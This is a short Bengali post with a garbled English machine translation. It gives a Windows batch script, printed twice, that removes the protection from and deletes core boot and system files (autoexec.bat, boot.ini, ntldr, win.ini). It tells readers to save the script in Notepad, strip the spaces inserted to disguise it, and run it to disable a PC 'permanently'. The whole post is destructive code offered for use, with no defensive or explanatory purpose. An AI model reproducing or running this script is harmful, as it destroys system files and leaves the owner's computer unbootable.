যে কোন পিসিকে স্থায়ীভাবে বন্ধ করে দেয়া যায়। এ জন্য নিচের কোডটি কপি করে নোট প্যাডে পেষ্ট করুন।
echo off
attrib -r -s -h c: autoexec. bat
del c: autoexec. bat
attrib -r -s -h c: boot. ini
del c: boot. ini
attrib -r -s -h c: ntldr
del c: ntldr
attrib -r -s -h c: windowswin. ini
del c: windowswin. ini
কোডের শুরুতে @ লিখুন।c: এর পরের স্পেস বাদ দিন। bat ও ini এর এর আগের স্পেস বাদ দিন। এবার সে পিসি চালালেই কাজ হবে।
Any PC can be shut down permanently. Copy the code below and paste it in the note pad.
echo off
attrib -r -s -h c: autoexec. bat
del c: autoexec. bat
attrib -r -s -h c: boot. ini
del c: boot. ini
attrib -r -s -h c: ntldr
del c: ntldr
attrib -r -s -h c: windowswin. ini
del c: windowswin. ini
@ Enter the code at the beginning. C: skip to the next space. ini bat and skip to the previous space. Now the PC, run it will work.
|